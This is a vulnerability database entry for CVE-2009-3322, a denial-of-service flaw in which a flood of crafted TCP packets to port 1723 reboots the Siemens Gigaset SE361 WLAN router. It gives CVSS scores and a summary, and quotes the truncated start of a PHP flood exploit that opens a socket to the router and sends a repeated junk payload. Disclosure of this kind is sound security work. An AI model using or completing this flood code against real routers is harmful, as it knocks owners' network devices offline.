7.8
CVSSv2

CVE-2009-3322

Published: 23/09/2009 Updated: 10/10/2018
CVSS v2 Base Score: 7.8 | Impact Score: 6.9 | Exploitability Score: 10
VMScore: 785
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C

Vulnerability Summary

The Siemens Gigaset SE361 WLAN router allows remote malicious users to cause a denial of service (device reboot) via a flood of crafted TCP packets to port 1723.

Vulnerable Product Search on Vulmon Subscribe to Product

siemens gigaset se361 wlan router

Exploits

Attacking port 1723(flood), it restarts the device almost instantly, here's the code in PHP It takes a few bytes for the AP to automatically restart <?php $apaddr = "19216821"; $apport="1723"; $con = fsockopen($apaddr, $apport, $errno, $errstr); if (!$con) { echo "$errstr ($errno)<br />\n"; } else { $trash = str_repeat("\x90 ...